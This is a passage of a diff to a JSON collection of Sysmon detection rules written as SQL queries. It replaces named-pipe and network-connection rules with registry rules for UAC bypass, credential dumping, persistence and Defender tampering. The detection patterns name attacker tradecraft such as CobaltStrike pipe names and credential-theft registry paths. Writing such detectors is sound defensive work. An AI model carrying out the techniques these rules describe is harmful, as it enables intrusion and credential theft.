LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "title": "New Application in AppCompat", + "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_new_application_appcompat.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + ], + "filename": "registry_set_persistence_mycomputer.yml" + }, + { + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Modification of IE Registry Settings", + "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "status": "experimental", + "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1112" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((Details LIKE 'DWORD%' ESCAPE '\\') OR (Details IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (Details = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_persistence_ie.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE 